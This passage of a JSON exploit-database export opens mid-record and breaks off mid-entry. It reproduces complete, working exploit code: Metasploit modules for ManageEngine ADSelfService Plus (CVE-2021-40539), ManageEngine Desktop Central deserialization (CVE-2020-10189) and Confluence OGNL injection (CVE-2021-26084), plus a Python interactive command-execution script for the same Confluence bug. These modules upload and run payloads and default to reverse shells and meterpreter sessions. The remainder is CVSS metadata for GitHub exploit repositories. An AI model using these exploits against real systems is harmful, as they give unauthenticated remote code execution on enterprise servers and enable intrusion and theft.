failed to respond to check.') \nend \n \nunless res.code == 200 && res.body.match?(%r{mobLogo.*/temp/tempMobPreview\\.jpeg}) \nreturn CheckCode::Safe('Failed to bypass REST API authentication.') \nend \n \nCheckCode::Vulnerable('Successfully bypassed REST API authentication.') \nend \n \ndef exploit \nupload_payload_jar \nexecute_payload_jar \nend \n \ndef upload_payload_jar \nprint_status(\"Uploading payload JAR: #{jar_filename}\") \n \njar = payload.encoded_jar \njar.add_file(\"#{class_name}.class\", constructor_class) # Hack, tbh \n \nform = Rex::MIME::Message.new \nform.add_part('unspecified', nil, nil, 'form-data; name=\"methodToCall\"') \nform.add_part('yas', nil, nil, 'form-data; name=\"Save\"') \nform.add_part('smartcard', nil, nil, 'form-data; name=\"form\"') \nform.add_part('Add', nil, nil, 'form-data; name=\"operation\"') \nform.add_part(jar.pack, 'application/java-archive', 'binary', \n%(form-data; name=\"CERTIFICATE_PATH\"; filename=\"#{jar_filename}\")) \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/RestAPI/LogonCustomization'), \n'ctype' => \"multipart/form-data; boundary=#{form.bound}\", \n'data' => form.to_s \n) \n \nunless res&.code == 404 \nfail_with(Failure::NotVulnerable, 'Failed to upload payload JAR') \nend \n \n# C:\\ManageEngine\\ADSelfService Plus\\bin (working directory) \nregister_file_for_cleanup(jar_filename) \n \nprint_good('Successfully uploaded payload JAR') \nend \n \ndef execute_payload_jar \nprint_status('Executing payload JAR') \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/RestAPI/Connection'), \n'vars_post' => { \n'methodToCall' => 'openSSLTool', \n'action' => 'generateCSR', \n# https://docs.oracle.com/javase/8/docs/technotes/tools/unix/keytool.html \n'VALIDITY' => \"#{rand(1..365)} -providerclass #{class_name} -providerpath #{jar_filename}\" \n} \n) \n \nunless res&.code == 404 \nfail_with(Failure::PayloadFailed, 'Failed to execute 
payload JAR') \nend \n \nprint_good('Successfully executed payload JAR') \nend \n \ndef jar_filename \n@jar_filename ||= \"#{rand_text_alphanumeric(8..16)}.jar\" \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/165085/manageengine_adselfservice_plus_cve_2021_40539.rb.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-14T22:50:18", "description": "", "cvss3": {}, "published": "2020-03-14T00:00:00", "type": "packetstorm", "title": "ManageEngine Desktop Central Java Deserialization", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-10189"], "modified": "2020-03-14T00:00:00", "id": "PACKETSTORM:156730", "href": "https://packetstormsecurity.com/files/156730/ManageEngine-Desktop-Central-Java-Deserialization.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::Powershell \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'ManageEngine Desktop Central Java Deserialization', \n'Description' => %q{ \nThis module exploits a Java deserialization vulnerability in the \ngetChartImage() method from the FileStorage class within ManageEngine \nDesktop Central versions < 10.0.474. Tested against 10.0.465 x64. \n \n\"The short-term fix for the arbitrary file upload vulnerability was \nreleased in build 10.0.474 on January 20, 2020. 
In continuation of that, \nthe complete fix for the remote code execution vulnerability is now \navailable in build 10.0.479.\" \n}, \n'Author' => [ \n'mr_me', # Discovery and exploit \n'wvu' # Module \n], \n'References' => [ \n['CVE', '2020-10189'], \n['URL', 'https://srcincite.io/advisories/src-2020-0011/'], \n['URL', 'https://srcincite.io/pocs/src-2020-0011.py.txt'], \n['URL', 'https://twitter.com/steventseeley/status/1235635108498948096'], \n['URL', 'https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html'] \n], \n'DisclosureDate' => '2020-03-05', # 0day release \n'License' => MSF_LICENSE, \n'Platform' => 'windows', \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => true, \n'Targets' => [ \n['Windows Command', \n'Arch' => ARCH_CMD, \n'Type' => :win_cmd \n], \n['Windows Dropper', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :win_dropper \n], \n['PowerShell Stager', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :psh_stager \n] \n], \n'DefaultTarget' => 2, \n'DefaultOptions' => { \n'RPORT' => 8383, \n'SSL' => true, \n'WfsDelay' => 60 # It can take a little while to trigger \n}, \n'CmdStagerFlavor' => 'certutil', # This works without issue \n'Notes' => { \n'PatchedVersion' => Gem::Version.new('100474'), \n'Stability' => [SERVICE_RESOURCE_LOSS], # May 404 the upload page? 
\n'Reliability' => [FIRST_ATTEMPT_FAIL], # Payload upload may fail \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n)) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'configurations.do') \n) \n \nunless res \nreturn CheckCode::Unknown('Target is not responding to check') \nend \n \nunless res.code == 200 && res.body.include?('ManageEngine Desktop Central') \nreturn CheckCode::Unknown('Target is not running Desktop Central') \nend \n \nversion = res.get_html_document.at('//input[@id = \"buildNum\"]/@value')&.text \n \nunless version \nreturn CheckCode::Detected('Could not detect Desktop Central version') \nend \n \nvprint_status(\"Detected Desktop Central version #{version}\") \n \nif Gem::Version.new(version) < notes['PatchedVersion'] \nreturn CheckCode::Appears(\"#{version} is an exploitable version\") \nend \n \nCheckCode::Safe(\"#{version} is not an exploitable version\") \nend \n \ndef exploit \n# NOTE: Automatic check is implemented by the AutoCheck mixin \nsuper \n \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \n \ncase target['Type'] \nwhen :win_cmd \nexecute_command(payload.encoded) \nwhen :win_dropper \nexecute_cmdstager \nwhen :psh_stager \nexecute_command(cmd_psh_payload( \npayload.encoded, \npayload.arch.first, \nremove_comspec: true \n)) \nend \nend \n \ndef execute_command(cmd, _opts = {}) \n# XXX: An executable is required to run arbitrary commands \ncmd.prepend('cmd.exe /c ') if target['Type'] == :win_dropper \n \nvprint_status(\"Serializing command: #{cmd}\") \n \n# I identified mr_me's binary blob as the CommonsBeanutils1 payload :) \nserialized_payload = Msf::Util::JavaDeserialization.ysoserial_payload( \n'CommonsBeanutils1', \ncmd \n) \n \n# XXX: Patch in expected serialVersionUID \nserialized_payload[140, 8] = \"\\xcf\\x8e\\x01\\x82\\xfe\\x4e\\xf1\\x7e\" \n \n# 
Rock 'n' roll! \nupload_serialized_payload(serialized_payload) \ndeserialize_payload \nend \n \ndef upload_serialized_payload(serialized_payload) \nprint_status('Uploading serialized payload') \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, \n'/mdm/client/v1/mdmLogUploader'), \n'ctype' => 'application/octet-stream', \n'vars_get' => { \n'udid' => 'si\\\\..\\\\..\\\\..\\\\webapps\\\\DesktopCentral\\\\_chart', \n'filename' => 'logger.zip' \n}, \n'data' => serialized_payload \n) \n \nunless res && res.code == 200 \nfail_with(Failure::UnexpectedReply, 'Could not upload serialized payload') \nend \n \nprint_good('Successfully uploaded serialized payload') \n \n# C:\\Program Files\\DesktopCentral_Server\\bin \nregister_file_for_cleanup('..\\\\webapps\\\\DesktopCentral\\\\_chart\\\\logger.zip') \nend \n \ndef deserialize_payload \nprint_status('Deserializing payload') \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'cewolf/'), \n'vars_get' => {'img' => '\\\\logger.zip'} \n) \n \nunless res && res.code == 200 \nfail_with(Failure::UnexpectedReply, 'Could not deserialize payload') \nend \n \nprint_good('Successfully deserialized payload') \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/156730/desktopcentral_deserialization.rb.txt", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-10T05:12:51", "description": "", "cvss3": {}, "published": "2021-09-10T00:00:00", "type": "packetstorm", "title": "Atlassian Confluence WebWork OGNL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-10T00:00:00", "id": "PACKETSTORM:164122", "href": "https://packetstormsecurity.com/files/164122/Atlassian-Confluence-WebWork-OGNL-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: 
https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Atlassian Confluence WebWork OGNL Injection', \n'Description' => %q{ \nThis module exploits an OGNL injection in Atlassian Confluence's \nWebWork component to execute commands as the Tomcat user. \n}, \n'Author' => [ \n'Benny Jacob', # Discovery \n'Jang', # Analysis \n'wvu' # Analysis and exploit \n], \n'References' => [ \n['CVE', '2021-26084'], \n['URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html'], \n['URL', 'https://jira.atlassian.com/browse/CONFSERVER-67940'], \n['URL', 'https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis'], \n['URL', 'https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md'], \n['URL', 'https://testbnull.medium.com/atlassian-confluence-pre-auth-rce-cve-2021-26084-v%C3%A0-c%C3%A2u-chuy%E1%BB%87n-v%E1%BB%81-%C4%91i%E1%BB%83m-m%C3%B9-khi-t%C3%ACm-bug-43ab36b6c455'], \n['URL', 'https://tradahacking.vn/atlassian-confluence-cve-2021-26084-the-other-side-of-bug-bounty-45ed19c814f6'] \n], \n'DisclosureDate' => '2021-08-25', # Vendor advisory \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], # TODO: Windows? 
\n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => false, # Tomcat user \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_bash' \n} \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper, \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 8090 \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [ \n# /var/atlassian/application-data/confluence/analytics-logs/*.atlassian-analytics.log \n# /var/atlassian/application-data/confluence/logs/atlassian-confluence.log \nIOC_IN_LOGS, \nARTIFACTS_ON_DISK # CmdStager \n] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \ntoken1 = rand_text_alphanumeric(8..16) \ntoken2 = rand_text_alphanumeric(8..16) \ntoken3 = rand_text_alphanumeric(8..16) \n \nres = inject_ognl(\"#{token1}'+'#{token2}'+'#{token3}\") \n \nreturn CheckCode::Unknown unless res \n \nunless res.code == 200 && res.body.include?(\"#{token1}#{token2}#{token3}\") \nreturn CheckCode::Safe('Failed to test OGNL injection.') \nend \n \nCheckCode::Vulnerable('Successfully tested OGNL injection.') \nend \n \ndef exploit \nprint_status(\"Executing #{payload_instance.refname} (#{target.name})\") \n \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper \nexecute_cmdstager \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nres = inject_ognl(ognl_payload(cmd)) \n \nunless res&.code == 200 && res.body.match?(/queryString.*Process.*pid.*exitValue/) \nfail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\") \nend \n \nvprint_good(\"Successfully executed command: #{cmd}\") \nend \n \ndef 
inject_ognl(ognl) \nsend_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/pages/createpage-entervariables.action'), \n'vars_post' => { \n# https://commons.apache.org/proper/commons-ognl/apidocs/org/apache/commons/ognl/JavaCharStream.html \n# https://github.com/jkuhnert/ognl/blob/f4e18cda6a89bcdad15c617c0d94013a854a1e93/src/main/java/ognl/JavaCharStream.java#L324-L341 \n'queryString' => Rex::Text.to_hex(ognl, '\\\\u00') \n} \n) \nend \n \ndef ognl_payload(cmd) \n# https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#expression-language-el---code-execution \n# https://www.tutorialspoint.com/java/lang/class_forname_loader.htm \n# https://docs.oracle.com/javase/7/docs/api/java/lang/ProcessBuilder.html \n# https://docs.oracle.com/javase/8/docs/api/java/util/Base64.Decoder.html \n<<~OGNL.gsub(/^\\s+/, '').tr(\"\\n\", '') \n'+Class.forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"js\").eval(' \nnew java.lang.ProcessBuilder( \n\"/bin/bash\", \n\"-c\", \nnew java.lang.String( \njava.util.Base64.getDecoder().decode(\"#{Rex::Text.encode_base64(cmd)}\") \n) \n).start() \n')+' \nOGNL \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164122/atlassian_confluence_webwork_ognl_injection.rb.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-01T15:58:38", "description": "", "cvss3": {}, "published": "2021-09-01T00:00:00", "type": "packetstorm", "title": "Confluence Server 7.12.4 OGNL Injection Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-01T00:00:00", "id": "PACKETSTORM:164013", "href": "https://packetstormsecurity.com/files/164013/Confluence-Server-7.12.4-OGNL-Injection-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: Confluence Server 7.12.4 - 'OGNL injection' Remote Code Execution (RCE) (Unauthenticated) \n# Date: 
01/09/2021 \n# Exploit Author: h3v0x \n# Vendor Homepage: https://www.atlassian.com/ \n# Software Link: https://www.atlassian.com/software/confluence/download-archives \n# Version: All < 7.12.x versions before 7.12.5 \n# Tested on: Linux Distros \n# CVE : CVE-2021-26084 \n \n#!/usr/bin/python3 \n \n# References: \n# https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html \n# https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md \n \nimport requests \nfrom bs4 import BeautifulSoup \nimport optparse \n \nparser = optparse.OptionParser() \nparser.add_option('-u', '--url', action=\"store\", dest=\"url\", help=\"Base target host: http://confluencexxx.com\") \nparser.add_option('-p', '--path', action=\"store\", dest=\"path\", help=\"Path to exploitation: /pages/createpage-entervariables.action?SpaceKey=x\") \n \noptions, args = parser.parse_args() \nsession = requests.Session() \n \nurl_vuln = options.url \nendpoint = options.path \n \nif not options.url or not options.path: \n \nprint('[+] Specify an url target') \nprint('[+] Example usage: exploit.py -u http://xxxxx.com -p /pages/createpage-entervariables.action?SpaceKey=x') \nprint('[+] Example help usage: exploit.py -h') \nexit() \n \n \ndef banner(): \n \nprint('---------------------------------------------------------------') \nprint('[-] Confluence Server Webwork OGNL injection') \nprint('[-] CVE-2021-26084') \nprint('[-] https://github.com/h3v0x') \nprint('--------------------------------------------------------------- \\n') \n \n \ndef cmdExec(): \n \nwhile True: \ncmd = input('> ') \nxpl_url = url_vuln + endpoint \nxpl_headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36\", \"Connection\": \"close\", \"Content-Type\": \"application/x-www-form-urlencoded\", \"Accept-Encoding\": \"gzip, deflate\"} \nxpl_data = {\"queryString\": 
\"aaaaaaaa\\\\u0027+{Class.forName(\\\\u0027javax.script.ScriptEngineManager\\\\u0027).newInstance().getEngineByName(\\\\u0027JavaScript\\\\u0027).\\\\u0065val(\\\\u0027var isWin = java.lang.System.getProperty(\\\\u0022os.name\\\\u0022).toLowerCase().contains(\\\\u0022win\\\\u0022); var cmd = new java.lang.String(\\\\u0022\"+cmd+\"\\\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\\\u0022cmd.exe\\\\u0022, \\\\u0022/c\\\\u0022, cmd); } else{p.command(\\\\u0022bash\\\\u0022, \\\\u0022-c\\\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\\\u0022\\\\u0022; var output = \\\\u0022\\\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\\\u0027)}+\\\\u0027\"} \nrawHTML = session.post(xpl_url, headers=xpl_headers, data=xpl_data) \n \nsoup = BeautifulSoup(rawHTML.text, 'html.parser') \nqueryStringValue = soup.find('input',attrs = {'name':'queryString', 'type':'hidden'})['value'] \nprint(queryStringValue) \n \n \nbanner() \ncmdExec() \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164013/confluenceserver7124-exec.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "githubexploit": [{"lastseen": "2022-05-01T13:10:07", "description": "Exploitation code for CVE-2021-40539\n\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T14:49:27", "type": "githubexploit", "title": "Exploit for Improper 
Authentication in Zohocorp Manageengine Adselfservice Plus", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2022-04-30T15:43:07", "id": "A32F9E91-783B-5C20-9630-6A4E3DDA9AFF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:38:38", "description": "# CVE-2021-26084\nConfluence aut...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-08T11:01:49", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": 
"2021-10-22T04:53:46", "id": "EF37F62F-1579-535A-9C3E-49B080F41CAC", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:40", "description": "# CVE-2021-26084 patch \n\n CVE-2021-26084 patch provided by \"Co...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-08T17:05:16", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-08T17:29:07", "id": "84D5F04A-0DDB-5788-8759-DA99D303B756", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:29:31", "description": "# CVE-2021-26084\nThis i...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", 
"userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-02T07:05:23", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-02T07:07:25", "id": "DC2A0BD8-2ABF-5885-957D-0FA3B058665C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-27T09:24:07", "description": "# CVE-2021-26084\nCVE-2021-26084 Confluence OGNL injection\n\n![\u56fe\u7247]...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-03T07:41:36", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-12-27T09:00:16", "id": "B16D26DB-D60C-5C0C-9452-80112720B442", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:43", "description": "This is a quick and dirty poc, tuned for a specifc confluence in...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-07T12:04:09", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-11T18:14:44", "id": "63E9680A-4D3C-5C4C-9EB3-63F2DB64F66D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-08T12:41:20", "description": "# CVE-2021-26084\nProof of concept for CVE-2021-26084. 
\n\nConfluen...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-01T15:19:19", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-01-08T04:36:30", "id": "BFA4DC64-759A-5113-842C-923C98D12B44", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-18T22:04:53", "description": "# CVE-2021-26084\n# confluence\u8fdc\u7a0b\u4ee3\u7801\u6267\u884cRCE\n\n## Code By:Jun_sheng @\u6a58\u5b50...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-25T03:07:28", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", 
